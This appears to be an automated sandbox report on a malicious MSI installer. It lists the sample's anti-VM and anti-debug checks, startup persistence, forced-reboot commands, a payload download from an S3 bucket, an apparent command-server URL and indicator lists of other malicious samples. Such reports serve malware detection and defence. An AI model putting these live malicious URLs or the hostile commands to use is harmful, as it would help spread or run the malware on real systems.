API coverage: 6.4 %

Source: C:\Windows\SysWOW64\msiexec.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\fQQPwD.exe

Code function: 16_2_0007565E GetSystemInfo,

16_2_0007565E

Source: C:\Users\user\fQQPwD.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\Users\user\Desktop FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\Users\user FullSizeInformation	Jump to behavior

Source: fQQPwD.exe, 00000010.00000002.506299472.0000000007211000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Server
Source: fQQPwD.exe, 00000010.00000002.506299472.0000000007211000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: _j2Windows Essential Server Solutions without Hyper-V3K
Source: fQQPwD.exe, 00000010.00000002.506299472.0000000007211000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: _j5Datacenter Server without Hyper-V (core installation)
Source: fQQPwD.exe, 00000010.00000002.506299472.0000000007211000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: _j3Standard Server without Hyper-V (core installation)
Source: fQQPwD.exe, 00000010.00000002.505557333.000000000549A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
Source: fQQPwD.exe, 00000010.00000002.506299472.0000000007211000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: _j!Enterprise Server without Hyper-V
Source: fQQPwD.exe, 00000010.00000002.506299472.0000000007211000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: _j5Enterprise Server without Hyper-V (core installation)
Source: fQQPwD.exe, 00000010.00000002.506299472.0000000007211000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Standard Server without Hyper-Vdk
Source: fQQPwD.exe, 00000010.00000002.506299472.0000000007211000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: _j!Datacenter Server without Hyper-V
Source: fQQPwD.exe, 00000010.00000002.506299472.0000000007211000.00000004.00000800.00020000.00000000.sdmp, fQQPwD.exe, 00000010.00000002.507141335.000000000734E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: HPC Edition without Hyper-V
Source: 412f31.msi.1.dr	Binary or memory string: 01234567890.0.0.0.%dVMware, Inc.VMware Virtual PlatformVMware7,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IROOT\CIMV2SELECT * FROM Win32_ComputerSystemSELECT * FROM Win32_BIOSManufacturerModelVersionGetting system informationManufacturer [Model [BIOS [IsWow64Processkernel32Software\Microsoft\Windows NT\CurrentVersionSYSTEM\CurrentControlSet\Control\ProductOptionsCurrentMajorVersionNumberCurrentMinorVersionNumberCurrentVersionCurrentBuildNumberReleaseIdCSDVersionProductTypeProductSuiteWinNTServerNTSmall BusinessEnterpriseBackOfficeCommunicationServerTerminal ServerSmall Business(Restricted)EmbeddedNTDataCenterPersonalBladeEmbedded(Restricted)Security ApplianceStorage ServerCompute Server Failed to create IWbemLocator object. Error code: \\Could not connect to WMI provider. Error code: Failed to initialize security. Error code: Could not set proxy blanket. Error code: WQLWMI Query failed: []. Error code:

Source: C:\Users\user\fQQPwD.exe

Code function: 16_2_000F70E0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

16_2_000F70E0

Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000F848B mov eax, dword ptr fs:[00000030h]	16_2_000F848B
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000F84BC mov eax, dword ptr fs:[00000030h]	16_2_000F84BC
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000EA7C6 mov ecx, dword ptr fs:[00000030h]	16_2_000EA7C6

Source: C:\Users\user\fQQPwD.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000F70E0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		16_2_000F70E0
Source: C:\Users\user\fQQPwD.exe	Code function: 16_2_000DE294 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		16_2_000DE294

Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C shutdown -r -f -t 60	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c shutdown /r /t 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -f -t 60	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 1 /f	Jump to behavior

Source: fQQPwD.exe, 00000010.00000002.506732720.00000000072B6000.00000004.00000800.00020000.00000000.sdmp, fQQPwD.exe, 00000010.00000002.509048009.00000000076EC000.00000004.00000800.00020000.00000000.sdmp, fQQPwD.exe, 00000010.00000002.507141335.000000000734E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: fQQPwD.exe, 00000010.00000002.506732720.00000000072B6000.00000004.00000800.00020000.00000000.sdmp, fQQPwD.exe, 00000010.00000002.509048009.00000000076EC000.00000004.00000800.00020000.00000000.sdmp, fQQPwD.exe, 00000010.00000002.507141335.000000000734E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerT

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Users\user\fQQPwD.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Users\user\fQQPwD.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Users\user\fQQPwD.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Users\user\fQQPwD.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Users\user\fQQPwD.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Users\user\fQQPwD.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Users\user\fQQPwD.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Queries volume information: C:\Users\user\msedge_elf.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\fQQPwD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\fQQPwD.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	16_2_000FA23D
Source: C:\Users\user\fQQPwD.exe	Code function: EnumSystemLocalesW,	16_2_000FA493
Source: C:\Users\user\fQQPwD.exe	Code function: EnumSystemLocalesW,	16_2_000F64CD
Source: C:\Users\user\fQQPwD.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	16_2_000FA530
Source: C:\Users\user\fQQPwD.exe	Code function: EnumSystemLocalesW,	16_2_000FA783

Source: C:\Users\user\fQQPwD.exe

Code function: 16_2_000DE406 cpuid

16_2_000DE406

Source: C:\Users\user\fQQPwD.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\fQQPwD.exe

Code function: 16_2_000DF235 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

16_2_000DF235

Source: C:\Users\user\fQQPwD.exe

Code function: 16_2_000A2070 GetVersionExW,GetProductInfo,__Init_thread_header,GetNativeSystemInfo,

16_2_000A2070

Source: C:\Windows\SysWOW64\msiexec.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Replication Through Removable Media	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 Input Capture	1 System Time Discovery	1 Replication Through Removable Media	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	2 Registry Run Keys / Startup Folder	12 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	2 Registry Run Keys / Startup Folder	2 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Timestomp	NTDS	146 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	14 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	31 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 File Deletion	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	141 Masquerading	DCSync	31 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	12 Process Injection	/etc/passwd and /etc/shadow	1 Remote System Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
DRTO10179793.msi	2%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\shi7C43.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\shi7D6D.tmp	0%	ReversingLabs
C:\Users\user\digimn.bz2	0%	ReversingLabs
C:\Users\user\fQQPwD.exe (copy)	0%	ReversingLabs
C:\Users\user\garurumon.bz2	8%	ReversingLabs
C:\Users\user\msedge_elf.dll (copy)	8%	ReversingLabs
C:\Windows\Installer\MSI8958.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI8D6F.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI8E3C.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI90BD.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI91B8.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI96CA.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI9796.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI9E0F.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI9F39.tmp	0%	ReversingLabs
C:\Windows\Installer\MSIA577.tmp	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://20.203.138.85/megazord2023/index.php	0%	Virustotal		Browse
http://html4/loose.dtd	0%	Avira URL Cloud	safe
http://20.203.138.85/megazord2023/index.php	0%	Avira URL Cloud	safe
https://amxx1515cabreun23.asxo	0%	Avira URL Cloud	safe
https://HTTP/1.1	0%	Avira URL Cloud	safe
https://amxx1515cabreun23.asxo/	0%	Avira URL Cloud	safe
http://.css	0%	Avira URL Cloud	safe
http://.jpg	0%	Avira URL Cloud	safe
http://20.203.138	0%	Avira URL Cloud	safe
https://amxx1515cabreun23.asxo4	0%	Avira URL Cloud	safe
https://amxx1515cabreun23.LZ5	0%	Avira URL Cloud	safe
http://20.203.138.85	0%	Avira URL Cloud	safe
https://collect.installeranalytics.comhttp://collect.installeranalytics.comhttps://installeranalytic	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s3-w.us-east-1.amazonaws.com	3.5.17.120	true	false	high
collect.installeranalytics.com	54.205.202.31	true	false	high
mzrdmodlonnce.s3.amazonaws.com	unknown	unknown	false	high
amxx1515cabreun23.asxo	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://20.203.138.85/megazord2023/index.php	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://collect.installeranalytics.com/	false		high
https://mzrdmodlonnce.s3.amazonaws.com/digivolve.msi	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://html4/loose.dtd	shi7C43.tmp.2.dr	false	Avira URL Cloud: safe	low
https://HTTP/1.1	shi7C43.tmp.2.dr	false	Avira URL Cloud: safe	low
https://amxx1515cabreun23.asxo	fQQPwD.exe, 00000010.00000002.508539342.00000000075E3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.thawte.com/cps0/	DRTO10179793.msi, MSI91B8.tmp.1.dr, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr, MSI8E3C.tmp.1.dr	false		high
https://www.thawte.com/repository0W	DRTO10179793.msi, MSI91B8.tmp.1.dr, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr, MSI8E3C.tmp.1.dr	false		high
http://stackoverflow.com/q/11564914;	fQQPwD.exe, 00000010.00000002.509928645.0000000009A1C000.00000020.00000001.01000000.00000005.sdmp, garurumon.bz2.2.dr	false		high
https://www.advancedinstaller.com	DRTO10179793.msi, MSI91B8.tmp.1.dr, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr, MSI8E3C.tmp.1.dr	false		high
https://amxx1515cabreun23.asxo/	fQQPwD.exe, 00000010.00000002.506633534.0000000007287000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://collect.installeranalytics.com	DRTO10179793.msi, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr	false		high
http://.css	shi7C43.tmp.2.dr	false	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	fQQPwD.exe, 00000010.00000002.506299472.0000000007211000.00000004.00000800.00020000.00000000.sdmp, fQQPwD.exe, 00000010.00000002.507141335.000000000734E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://.jpg	shi7C43.tmp.2.dr	false	Avira URL Cloud: safe	low
http://20.203.138.85	fQQPwD.exe, 00000010.00000002.506299472.0000000007211000.00000004.00000800.00020000.00000000.sdmp, fQQPwD.exe, 00000010.00000002.508470443.00000000075CC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://stackoverflow.com/q/2152978/23354	fQQPwD.exe, 00000010.00000002.509928645.0000000009A1C000.00000020.00000001.01000000.00000005.sdmp, garurumon.bz2.2.dr	false		high
https://amxx1515cabreun23.asxo4	fQQPwD.exe, 00000010.00000002.506633534.0000000007287000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://collect.installeranalytics.com	DRTO10179793.msi, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr	false		high
https://collect.installeranalytics.comhttp://collect.installeranalytics.comhttps://installeranalytic	DRTO10179793.msi, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr	false	Avira URL Cloud: safe	unknown
http://20.203.138	fQQPwD.exe, 00000010.00000002.508505822.00000000075D8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://amxx1515cabreun23.LZ5	fQQPwD.exe, 00000010.00000002.508539342.00000000075E3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
20.203.138.85	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
54.205.202.31	collect.installeranalytics.com	United States	14618	AMAZON-AESUS	false
3.5.17.120	s3-w.us-east-1.amazonaws.com	United States	14618	AMAZON-AESUS	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	777332
Start date and time:	2023-01-03 16:28:15 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	DRTO10179793.msi
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.rans.evad.winMSI@15/41@3/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 15.4% (good quality ratio 14.3%) Quality average: 58.4% Quality standard deviation: 26.4%
HCA Information:	Successful, ratio: 68% Number of executed functions: 12 Number of non-executed functions: 91
Cookbook Comments:	Found application associated with file extension: .msi

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, login.live.com, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:29:16	API Interceptor	3x Sleep call for process: msiexec.exe modified
16:29:35	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fQQPwD.lnk

Joe Sandbox View / Context

IPs

⊘No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
s3-w.us-east-1.amazonaws.com	file.exe	Get hash	malicious	Browse	52.217.33.108
	file.exe	Get hash	malicious	Browse	54.231.193.137
	file.exe	Get hash	malicious	Browse	52.217.32.76
	file.exe	Get hash	malicious	Browse	54.231.171.1
	SecuriteInfo.com.Variant.Jaik.110184.18050.14160.exe	Get hash	malicious	Browse	52.217.207.17
	https://github.com/Roberhdjsjshhs/aternos/releases/download/video/nUcN4Rs3h2k9.exe	Get hash	malicious	Browse	52.216.207.99
	file.exe	Get hash	malicious	Browse	52.217.107.100
	http://www.xaxnv.com/SHvmP	Get hash	malicious	Browse	52.216.43.113
	gabCqSerd5.exe	Get hash	malicious	Browse	52.217.235.89
	https://gist.github.com/iGlitch/083823db93cb424d97c4d27a6c5bf259#file-death-bat	Get hash	malicious	Browse	52.217.91.124
	file.exe	Get hash	malicious	Browse	52.216.78.116
	file.exe	Get hash	malicious	Browse	52.217.100.44
	uiVa6TG1Hn.exe	Get hash	malicious	Browse	52.217.192.193
	v1eXHfmaLk.exe	Get hash	malicious	Browse	52.216.228.240
	http://ww1.citymanger.com/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fHx8fHw2MzllMjM0NjJmYThlfHx8MTY3MTMwODEwMi4yMTA3fDM2MTBiOTQ4NzRjZTMyNTNjZDM5NzMwMjBlMTBhZDU0YzdmZDY0YjN8fHx8fDF8fDB8MHx8fHwxfHx8fHwwfDB8fHx8fHx8fHx8MHwwfHwwfHx8MHwwfFcxMD18fDF8VzEwPXxlNDg2YmQzNzVjNTUwMTRkZTNlMjFmY2UxMGNmN2I3Nzk1OTNhMTMyfDB8ZHAtdGVhbWludGVybmV0MTJfM3BofDB8MA%3D%3D&query=Commercial%20Credit%20Cards&afdToken=ChMI6Yzm7ruB_AIVsRRZBR3qCgFbElPcHWC0A69lhJq2UizR9de-aa78nx-1lwOsWjZvaE-ugjc18fdM9m5hvPrFP3svaxihZe9H5weiqNvx6XuUvWQVxLP2S-kQyZo6jyKt6HcRLYNtAw&pcsa=false&nb=0&nm=37&nx=205&ny=92&is=530x497&clkt=117	Get hash	malicious	Browse	52.217.16.188
	file.exe	Get hash	malicious	Browse	52.217.192.1
	PO#20221215.exe	Get hash	malicious	Browse	52.217.138.113
	file.exe	Get hash	malicious	Browse	52.216.211.73
	file.exe	Get hash	malicious	Browse	3.5.10.110
	file.exe	Get hash	malicious	Browse	54.231.171.9

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	message (1).html	Get hash	malicious	Browse	13.107.237.45
	http://login.datacolumbase.sbs	Get hash	malicious	Browse	20.195.210.220
	I9sNE4Qudl.exe	Get hash	malicious	Browse	52.168.117.173
	INVOICE-462672.html	Get hash	malicious	Browse	13.107.238.45
	Ref# Voice 925 (585087).htm	Get hash	malicious	Browse	13.107.237.45
	Ref# Voice 925 (585086).htm	Get hash	malicious	Browse	13.107.237.38
	9hXTu5MMZL.exe	Get hash	malicious	Browse	13.107.43.13
	#Ud83d#Udce7FAX#U2122 EFT Remittance-01-02-202200521789.html	Get hash	malicious	Browse	13.107.237.60
	https://hu8vhzfbth637b8c137f5ef.pacificx.ru/jq/9rocqytwml0mx1llop5hsedae	Get hash	malicious	Browse	40.99.150.114
	#U4ea7#U54c1#U5217#U8868 2023-03-28.exe	Get hash	malicious	Browse	20.25.31.15
	mrRyNqyhJG.elf	Get hash	malicious	Browse	13.107.141.151
	file.exe	Get hash	malicious	Browse	52.168.117.173
	file.exe	Get hash	malicious	Browse	104.208.16.94
	file.exe	Get hash	malicious	Browse	20.42.73.29
	file.exe	Get hash	malicious	Browse	104.208.16.94
	file.exe	Get hash	malicious	Browse	13.89.179.12
	file.exe	Get hash	malicious	Browse	52.168.117.173
	SecuriteInfo.com.Trojan.GenericKD.64662634.30711.13556.exe	Get hash	malicious	Browse	20.189.173.20
	file.exe	Get hash	malicious	Browse	20.189.173.22
	file.exe	Get hash	malicious	Browse	20.189.173.20

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ce5f3254611a8c095a3d821d44539877	I9sNE4Qudl.exe	Get hash	malicious	Browse	3.5.17.120
	file.exe	Get hash	malicious	Browse	3.5.17.120
	file.exe	Get hash	malicious	Browse	3.5.17.120
	file.exe	Get hash	malicious	Browse	3.5.17.120
	file.exe	Get hash	malicious	Browse	3.5.17.120
	file.exe	Get hash	malicious	Browse	3.5.17.120
	file.exe	Get hash	malicious	Browse	3.5.17.120
	file.exe	Get hash	malicious	Browse	3.5.17.120
	file.exe	Get hash	malicious	Browse	3.5.17.120
	file.exe	Get hash	malicious	Browse	3.5.17.120
	file.exe	Get hash	malicious	Browse	3.5.17.120
	GsixVTA6hs.exe	Get hash	malicious	Browse	3.5.17.120
	file.exe	Get hash	malicious	Browse	3.5.17.120
	file.exe	Get hash	malicious	Browse	3.5.17.120
	file.exe	Get hash	malicious	Browse	3.5.17.120
	file.exe	Get hash	malicious	Browse	3.5.17.120
	file.exe	Get hash	malicious	Browse	3.5.17.120
	file.exe	Get hash	malicious	Browse	3.5.17.120
	file.exe	Get hash	malicious	Browse	3.5.17.120
	file.exe	Get hash	malicious	Browse	3.5.17.120

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\shi7C43.tmp	VuDUlvfL3Q.exe	Get hash	malicious	Browse
	GhjIqAjQKg.exe	Get hash	malicious	Browse
	0F9B1A70B9F5DAE682E68E8F0B01F3268013721D4D4FB.exe	Get hash	malicious	Browse
	0F9B1A70B9F5DAE682E68E8F0B01F3268013721D4D4FB.exe	Get hash	malicious	Browse
	ytyNnshVbS.exe	Get hash	malicious	Browse
	ytyNnshVbS.exe	Get hash	malicious	Browse
	Levelogger-4.6.2-Installer.exe	Get hash	malicious	Browse
	Levelogger-4.6.2-Installer.exe	Get hash	malicious	Browse
	setup.exe	Get hash	malicious	Browse
	setup.exe	Get hash	malicious	Browse
	qmGoZOH773.exe	Get hash	malicious	Browse
	B6A0CC1E5488C0C9F1429D1744F8C2F81F7DCE4229B83.exe	Get hash	malicious	Browse
	NFE__8758787586875858869.msi	Get hash	malicious	Browse
	NFE98798698BR.msi	Get hash	malicious	Browse
	DLSP1kcJYo.msi	Get hash	malicious	Browse
	nXJslq1j2Q.msi	Get hash	malicious	Browse
	JUV1irsrBU.msi	Get hash	malicious	Browse
	NFE-655432br.msi	Get hash	malicious	Browse
	NFE-655432br.msi	Get hash	malicious	Browse
	onYwrKS2DM.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Config.Msi\412f33.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	8742
Entropy (8bit):	5.714462990504336
Encrypted:	false
SSDEEP:	96:x7cPwJuevyj1qSrz03CsvRqUz03C6j977nvRqtHoYyY1NwF8/PuaaCPpTBGoJQFa:x4Gueqd0yg0yrNPJPpz
MD5:	3C61B2547F5DDC6A258A4F93F01E7EC8
SHA1:	AD677EFEFB157E9646C837B7467126FAB639508B
SHA-256:	0C8AB6CDCD013EDA032DEAD58E00CE529CCCF5AE10BF7A03D1A55E71D01543A8
